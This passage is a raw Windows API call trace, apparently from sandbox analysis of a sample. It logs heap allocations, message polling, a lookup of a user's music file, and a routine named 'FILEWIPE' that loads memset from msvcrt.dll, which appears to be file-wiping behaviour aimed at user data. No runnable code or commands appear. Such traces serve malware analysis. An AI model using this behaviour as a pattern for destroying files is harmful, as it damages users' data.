PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.913] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.913] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.913] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0180.913] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.914] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3eebe30, ftCreationTime.dwHighDateTime=0x1d5d8ce, ftLastAccessTime.dwLowDateTime=0x63358590, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0x63358590, ftLastWriteTime.dwHighDateTime=0x1d5e05d, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="3-CH0vN.m4a", cAlternateFileName="")) returned 0x90ae18 [0180.915] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0180.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0180.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0180.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0180.917] CharLowerBuffW (in: lpsz="byte[4888]", cchLength=0xa | out: lpsz="byte[4888]") returned 0xa [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1318) returned 0x8fff00 [0180.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0180.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.918] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.918] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0180.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0180.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0180.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0180.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.921] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0180.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0180.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0180.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0180.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0180.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0180.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0180.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0180.922] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0180.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0180.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0180.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.924] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0180.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0180.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2828 [0180.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2828, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0180.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.925] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0180.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0180.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.926] 